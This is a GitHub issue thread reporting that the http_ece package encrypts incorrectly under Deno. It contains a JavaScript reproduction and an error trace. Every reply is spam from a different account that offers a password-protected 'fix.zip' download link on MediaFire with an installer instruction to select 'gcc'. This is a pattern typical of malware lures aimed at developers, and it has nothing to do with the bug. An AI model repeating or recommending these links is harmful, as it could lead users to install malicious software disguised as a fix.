### ISSUE TITLE
`http_ece` encrypt wrong ciphertext

### ISSUE THREAD

**Issue by littledivy** [denoland/deno#25254]
```js
import ece from 'http_ece';
import crypto from 'node:crypto';
import { Buffer } from 'node:buffer';

const data = Buffer.from('Hello, world!');
const parameters = {
  key: crypto.randomBytes(16).toString('base64url'),
  salt: crypto.randomBytes(16).toString('base64url')
};
const encrypted = ece.encrypt(data, parameters);

const decrypted = ece.decrypt(encrypted, parameters);

console.log(decrypted.toString('utf8'));
```

```
$ DENO_FUTURE=1 deno run ece.mjs
✅ Granted env access to "ECE_KEYLOG".
error: Uncaught (in promise) Error: last record needs to start padding with a 2
    at unpad (file:///home/divy/gh/verification-web-push-on-Deno/node_modules/http_ece/ece.js:321:17)
    at decryptRecord (file:///home/divy/gh/verification-web-push-on-Deno/node_modules/http_ece/ece.js:346:10)
    at Object.decrypt (file:///home/divy/gh/verification-web-push-on-Deno/node_modules/http_ece/ece.js:389:17)
    at file:///home/divy/gh/verification-web-push-on-Deno/ece.mjs:12:21
```

Most likely the root cause for `web-push` bug: https://github.com/denoland/deno/issues/23693

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
